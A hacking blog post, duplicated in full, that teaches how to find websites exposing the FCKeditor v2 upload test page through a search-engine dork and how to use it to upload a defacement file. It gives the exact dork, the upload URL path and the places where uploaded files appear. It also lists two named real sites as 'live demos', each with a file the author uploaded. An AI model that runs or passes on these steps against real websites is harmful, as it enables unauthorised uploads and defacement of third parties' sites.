19:08
LazyHacker
FCKeditor v2 Files Upload Exploit
Google and Bing Dork: intitle:"FCKeditor - Uploaders Tests"
Catagory : Remote Upload
Exploit : http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Publisher : www.hackersunderground.blogspot.com
Go to Google.com or Bing.com and type this Dork : intitle:"FCKeditor - Uploaders Tests"
(use both serach enigines for getting more vulnrable websites)
now you'll Got FCK editor upload option, and you can get Upload option by going to this URL
http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Now chnage Select the "File Uploader" to use into PHP
Then Select your .txt deface and click on send it to the server (some websites allowed you to upload .html and .jpg files)
if your file sucessfully uploaded, you will got "File uploaded with no errors" Alert
to View your file see Uploaded File URL
or go to http://www.website.domain/userfiles/yourfilehere or http://www.website.domain/path/userfiles/yourfilehere
Live Demo : http://www.relationshiptrends.com/affiliate/fckeditor/editor/filemanager/connectors/uploadtest.html
http://minisite.nku.edu.tr/fckeditor/editor/filemanager/connectors/uploadtest.html
Result :
http://minisite.nku.edu.tr//userfiles/aaaaaaaa.txt
http://www.relationshiptrends.com/affiliate/img/aaaaaaaa.txt
I Spend my 30 minutes in writing this post
please Spent your 30 secondes and write a Comment below.
post by rishabh sharma hackersunderground
Google and Bing Dork: intitle:"FCKeditor - Uploaders Tests"
Catagory : Remote Upload
Exploit : http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Publisher : www.hackersunderground.blogspot.com
Go to Google.com or Bing.com and type this Dork : intitle:"FCKeditor - Uploaders Tests"
(use both serach enigines for getting more vulnrable websites)
now you'll Got FCK editor upload option, and you can get Upload option by going to this URL
http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Now chnage Select the "File Uploader" to use into PHP
Then Select your .txt deface and click on send it to the server (some websites allowed you to upload .html and .jpg files)
if your file sucessfully uploaded, you will got "File uploaded with no errors" Alert
to View your file see Uploaded File URL
or go to http://www.website.domain/userfiles/yourfilehere or http://www.website.domain/path/userfiles/yourfilehere
Live Demo : http://www.relationshiptrends.com/affiliate/fckeditor/editor/filemanager/connectors/uploadtest.html
http://minisite.nku.edu.tr/fckeditor/editor/filemanager/connectors/uploadtest.html
Result :
http://minisite.nku.edu.tr//userfiles/aaaaaaaa.txt
http://www.relationshiptrends.com/affiliate/img/aaaaaaaa.txt
I Spend my 30 minutes in writing this post
please Spent your 30 secondes and write a Comment below.
post by rishabh sharma hackersunderground
Posted in: TUTORIALS
0 comments:
Post a Comment